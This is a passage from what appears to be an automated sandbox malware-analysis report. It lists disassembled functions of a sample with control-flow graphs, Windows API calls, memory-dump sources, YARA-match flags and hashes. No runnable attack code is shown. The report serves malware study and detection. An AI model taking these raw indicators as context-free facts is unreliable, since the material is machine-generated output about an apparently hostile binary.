                                                                                              • Opcode Fuzzy Hash: 3f2fd3334294a15f7184f53d6f1be852731d885f0f5ad08d5a13779d675f1b31
                                                                                              • Instruction Fuzzy Hash: B3124F70E042989BDB14EB29CD467ED7B71EB42329F94429EE815573C1DB3C4E848BCA
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004E9C90 Relevance: 1.8, APIs: 1, Instructions: 560COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 309 4e9c90-4e9cdc 440 4e9cdd call 4ed0c6d 309->440 441 4e9cdd call 4ed0cec 309->441 442 4e9cdd call 4ed0c83 309->442 310 4e9ce2-4e9d00 311 4e9d07-4e9d0c 310->311 311->311 312 4e9d0e-4e9ebf call 4f7a20 call 4f7e70 * 2 call 4f7360 call 4f7e70 * 3 CoInitialize 311->312 327 4e9eea 312->327 328 4e9ec1-4e9ede 312->328 329 4e9eec-4e9ef5 327->329 337 4e9ee4 328->337 338 4ea270-4ea290 328->338 330 4e9f2c-4e9f52 329->330 331 4e9ef7-4e9f0c 329->331 335 4e9f89-4e9faf 330->335 336 4e9f54-4e9f69 330->336 333 4e9f0e-4e9f1c 331->333 334 4e9f22-4e9f29 call 4fcfc8 331->334 333->334 339 4ea4d2-4ea4d7 call 516597 333->339 334->330 343 4e9fe6-4ea00c 335->343 344 4e9fb1-4e9fc6 335->344 341 4e9f7f-4e9f86 call 4fcfc8 336->341 342 4e9f6b-4e9f79 336->342 337->327 354 4ea33b-4ea49a call 513a50 338->354 355 4ea296-4ea29b 338->355 341->335 342->339 342->341 346 4ea00e-4ea01d 343->346 347 4ea03d-4ea061 343->347 351 4e9fdc-4e9fe3 call 4fcfc8 344->351 352 4e9fc8-4e9fd6 344->352 356 4ea01f-4ea02d 346->356 357 4ea033-4ea03a call 4fcfc8 346->357 358 4ea098-4ea0be 347->358 359 4ea063-4ea078 347->359 351->343 352->339 352->351 439 4ea4a0-4ea4a5 354->439 355->327 363 4ea2a1-4ea2b0 355->363 356->339 356->357 357->347 367 4ea0f5-4ea11b 358->367 368 4ea0c0-4ea0d5 358->368 365 4ea08e-4ea095 call 4fcfc8 359->365 366 4ea07a-4ea088 359->366 386 4ea2c9-4ea329 call 4f7360 * 4 call 4e9c90 363->386 387 4ea2b2-4ea2c4 363->387 365->358 366->339 366->365 371 4ea14c-4ea16d 367->371 372 4ea11d-4ea12c 367->372 369 4ea0eb-4ea0f2 call 4fcfc8 368->369 370 4ea0d7-4ea0e5 368->370 369->367 370->339 370->369 380 4ea16f-4ea17b 371->380 381 4ea19b-4ea1b3 371->381 378 4ea12e-4ea13c 372->378 379 4ea142-4ea149 call 4fcfc8 372->379 378->339 378->379 379->371 389 4ea17d-4ea18b 380->389 390 4ea191-4ea198 call 4fcfc8 380->390 383 4ea1b5-4ea1c1 381->383 384 4ea1e1-4ea1f9 381->384 392 4ea1d7-4ea1de call 4fcfc8 383->392 393 4ea1c3-4ea1d1 383->393 394 4ea1fb-4ea207 384->394 395 4ea227-4ea23f 384->395 432 4ea32e-4ea336 386->432 387->327 389->339 389->390 390->381 392->384 393->339 393->392 399 4ea21d-4ea224 call 4fcfc8 394->399 400 4ea209-4ea217 394->400 402 4ea4b4-4ea4d1 call 4fc951 395->402 403 4ea245-4ea251 395->403 399->395 400->339 400->399 410 4ea4aa-4ea4b1 call 4fcfc8 403->410 411 4ea257-4ea265 403->411 410->402 411->339 419 4ea26b 411->419 419->410 432->329 439->329 440->310 441->310 442->310
                                                                                              APIs
                                                                                              • CoInitialize.OLE32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004E9EB8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1667895886.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1667875767.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667895886.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667951731.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.0000000000548000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668250799.00000000007F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668517959.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668534626.0000000000990000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668550436.0000000000991000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668564958.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4e0000_wIaKimJFke.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Initialize
                                                                                              • String ID:
                                                                                              • API String ID: 2538663250-0
                                                                                              • Opcode ID: 6f662471c6bcd76323e2e0815a1e2c6ae0b7ee8d882aad097bcb53c1a66516da
                                                                                              • Instruction ID: 09f24f4ed424300c185f25fbe8fdf5ee4e751548d7e9b2c18a3918fc0b88d67b
                                                                                              • Opcode Fuzzy Hash: 6f662471c6bcd76323e2e0815a1e2c6ae0b7ee8d882aad097bcb53c1a66516da
                                                                                              • Instruction Fuzzy Hash: 3432BC71A002589FDB18CF28CD88BEDB7B5EF46304F1081D9E509A7291D779AE84CF95
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0051A2BB Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 443 51a2bb-51a2c7 444 51a2f9-51a304 call 516e40 443->444 445 51a2c9-51a2cb 443->445 452 51a306-51a308 444->452 447 51a2e4-51a2f5 RtlAllocateHeap 445->447 448 51a2cd-51a2ce 445->448 449 51a2d0-51a2d7 call 5195bb 447->449 450 51a2f7 447->450 448->447 449->444 455 51a2d9-51a2e2 call 518633 449->455 450->452 455->444 455->447
                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00000000,004EF146,?,?,004FCD61,004EF146,?,004F73EB,E850CC8C), ref: 0051A2ED
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1667895886.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1667875767.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667895886.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667951731.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.0000000000548000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668250799.00000000007F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668517959.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668534626.0000000000990000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668550436.0000000000991000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668564958.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4e0000_wIaKimJFke.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: 6e52d60070242da04e0cf0c77ecfaac84fe7b6a14a92201e3d801314d06c366a
                                                                                              • Instruction ID: 0c4a7fba60884a7725908cf38d6ea293e52d70fcf7815b3c5bfea7d4ec26f550
                                                                                              • Opcode Fuzzy Hash: 6e52d60070242da04e0cf0c77ecfaac84fe7b6a14a92201e3d801314d06c366a
                                                                                              • Instruction Fuzzy Hash: 87E0653D20721256F62322659C05BDB3E49BF427B0F250121AC65D6192DF7ACCC091E7
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004E7540 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 468 4e7540-4e7544 469 4e7548-4e7552 GetFileAttributesA 468->469 470 4e7546 468->470 471 4e755b-4e755d 469->471 472 4e7554-4e7556 469->472 470->469 472->471 473 4e7558-4e755a 472->473
                                                                                              APIs
                                                                                              • GetFileAttributesA.KERNELBASE(?,004EC434), ref: 004E7549
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1667895886.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1667875767.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667895886.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667951731.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.0000000000548000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668250799.00000000007F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668517959.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668534626.0000000000990000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668550436.0000000000991000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668564958.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4e0000_wIaKimJFke.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: 8e4b8fbb68e9754216c93cc773ebfa096b5ea85c668d510ab7f457a222030698
                                                                                              • Instruction ID: d3ce480f28fc96eec8034ed061a5cc11978e97d65569cc7b38ba5a456186b219
                                                                                              • Opcode Fuzzy Hash: 8e4b8fbb68e9754216c93cc773ebfa096b5ea85c668d510ab7f457a222030698
                                                                                              • Instruction Fuzzy Hash: 8CC0803046564076ED1C4F3D414806633105B433FA7F427C9C0764B5E2D23ED807D714
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04ED0CEC Relevance: .4, Instructions: 446COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 474 4ed0cec-4ed0cee 475 4ed0c89-4ed0c8e 474->475 476 4ed0cf0-4ed0cfb 474->476 479 4ed0c95-4ed0ce7 475->479 478 4ed0cfe-4ed0d00 476->478 479->478
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1670194124.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4ed0000_wIaKimJFke.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a449b679d61fba2d00e5bb3d8c6f9606945660783c05364929be9098c1fa33ee
                                                                                              • Instruction ID: 546aab56377f31f2fad534432e8dca1677ba2f6e6dd8a1bbe6d286f99d53a8f3
                                                                                              • Opcode Fuzzy Hash: a449b679d61fba2d00e5bb3d8c6f9606945660783c05364929be9098c1fa33ee
                                                                                              • Instruction Fuzzy Hash: 36F0F4EF28D1147DF11291823F28AFBAB7DE2D2B31335987BF542D5442E2C80A4E2531
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04ED0C83 Relevance: .1, Instructions: 58COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 601 4ed0c83-4ed0c8e 603 4ed0c95-4ed0d00 601->603
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1670194124.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4ed0000_wIaKimJFke.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 075c26b713754d179b1a419cbfa7a745f6b4517890b9d00f91d1a2f8f7c48346
                                                                                              • Instruction ID: bc885a9fdb83d76734788d0cf03ca22018441dc13f53fb25f60ba93773be8e4f
                                                                                              • Opcode Fuzzy Hash: 075c26b713754d179b1a419cbfa7a745f6b4517890b9d00f91d1a2f8f7c48346
                                                                                              • Instruction Fuzzy Hash: 33F092FF28D1243CB04291823B28AFAA76EE0D2730330D877F802D1406E2C90A5E2132
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Non-executed Functions

                                                                                              Function 00522968 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1667895886.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1667875767.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667895886.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667951731.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.0000000000548000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668250799.00000000007F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668517959.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668534626.0000000000990000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668550436.0000000000991000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668564958.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4e0000_wIaKimJFke.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: __floor_pentium4
                                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                              • API String ID: 4168288129-2761157908
                                                                                              • Opcode ID: dfe815392fa7fe518e59f250c817592e1c589d5fe3ba0cdabfeefba0e6331d73
                                                                                              • Instruction ID: f9ab45d159d78cbac85b84841105d62c17539d262bbd425c4345c8d374259fe9
                                                                                              • Opcode Fuzzy Hash: dfe815392fa7fe518e59f250c817592e1c589d5fe3ba0cdabfeefba0e6331d73
                                                                                              • Instruction Fuzzy Hash: 1FC22B71E046289FDB25CE28ED447E9BBB5FF4A304F1445EAD44DA7280E778AE858F40
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004E60E0 Relevance: 5.9, Strings: 4, Instructions: 901COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1667895886.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1667875767.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667895886.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667951731.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.0000000000548000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668250799.00000000007F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668517959.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668534626.0000000000990000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668550436.0000000000991000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668564958.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4e0000_wIaKimJFke.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ConditionVariableWake
                                                                                              • String ID: UT$8UT$PUT$runas
                                                                                              • API String ID: 1192502693-4268881902
                                                                                              • Opcode ID: a1c37a78dedebef74c21fb1a1d2ccd33c902e2d1f1f626636198b32fe1459480
                                                                                              • Instruction ID: 71cae85cfdf875b0cf61af52ff0d46dcddfe7c6df949ad7a426bfe9b550eb21f
                                                                                              • Opcode Fuzzy Hash: a1c37a78dedebef74c21fb1a1d2ccd33c902e2d1f1f626636198b32fe1459480
                                                                                              • Instruction Fuzzy Hash: 5D525B71A10148ABDB08DF29CD85BEDBB62EF46348F50821EF805973C6D73D9A84CB95
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004EC990 Relevance: 4.6, APIs: 3, Instructions: 102networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • recv.WS2_32(?,?,00000004,00000000), ref: 004EC9DB
                                                                                              • recv.WS2_32(?,?,00000008,00000000), ref: 004ECA10
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1667895886.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1667875767.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667895886.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667951731.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.0000000000548000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668250799.00000000007F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668517959.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668534626.0000000000990000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668550436.0000000000991000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668564958.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4e0000_wIaKimJFke.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: recv
                                                                                              • String ID:
                                                                                              • API String ID: 1507349165-0
                                                                                              • Opcode ID: 66daaadd9704569547154806a5621fe22b0e87d0d1ecc5b14d5c676e89af0359
                                                                                              • Instruction ID: 5ce52dcf1f5a6c56bb56e52dda9e523289ed350177fa47383564680884ccb462
                                                                                              • Opcode Fuzzy Hash: 66daaadd9704569547154806a5621fe22b0e87d0d1ecc5b14d5c676e89af0359
                                                                                              • Instruction Fuzzy Hash: 96312B7590014C9FC710CB79DC85BEF7BA8FB0D728F100626E514E7382D678A8498BA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 005224D0 Relevance: 3.4, APIs: 2, Instructions: 450COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1667895886.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1667875767.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667895886.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667951731.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.0000000000548000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668250799.00000000007F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668517959.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668534626.0000000000990000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668550436.0000000000991000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668564958.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4e0000_wIaKimJFke.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: fa2bd79df6c39be84dc92fe6f2f83e849779d540683633a56f5ad8c746343782
                                                                                              • Instruction ID: 5c0831cbb0d8b70b6bdbdb37769051782c7ce6bebb3ff348836d6102467ce49f
                                                                                              • Opcode Fuzzy Hash: fa2bd79df6c39be84dc92fe6f2f83e849779d540683633a56f5ad8c746343782
                                                                                              • Instruction Fuzzy Hash: 43F15175E00229AFDF14CFA8D8806ADBBB1FF89314F15826DD815AB385D731AD41CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004FC54A Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetSystemTimePreciseAsFileTime.KERNEL32(?,004FC8B2,?,?,?,?,004FC8E7,?,?,?,?,?,?,004FBE5D,?,00000001), ref: 004FC563
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1667895886.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1667875767.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667895886.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667951731.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.0000000000548000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668250799.00000000007F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668517959.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668534626.0000000000990000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668550436.0000000000991000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668564958.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4e0000_wIaKimJFke.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Time$FilePreciseSystem
                                                                                              • String ID:
                                                                                              • API String ID: 1802150274-0
                                                                                              • Opcode ID: 5c4c2a217f744e7395efc248b9f8ae9e71df2b2be9ab66aa86352b1e61804a16
                                                                                              • Instruction ID: 533da5d491ba605011481ef292768ef9b985a3ec4aab443232edb4dc242a41a6
                                                                                              • Opcode Fuzzy Hash: 5c4c2a217f744e7395efc248b9f8ae9e71df2b2be9ab66aa86352b1e61804a16
                                                                                              • Instruction Fuzzy Hash: 7DD0223A98103CA38D217B84AC008FDBB189F03FD87021033EA0857210CA50BC00BBD9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00517780 Relevance: 1.5, Strings: 1, Instructions: 216COMMON
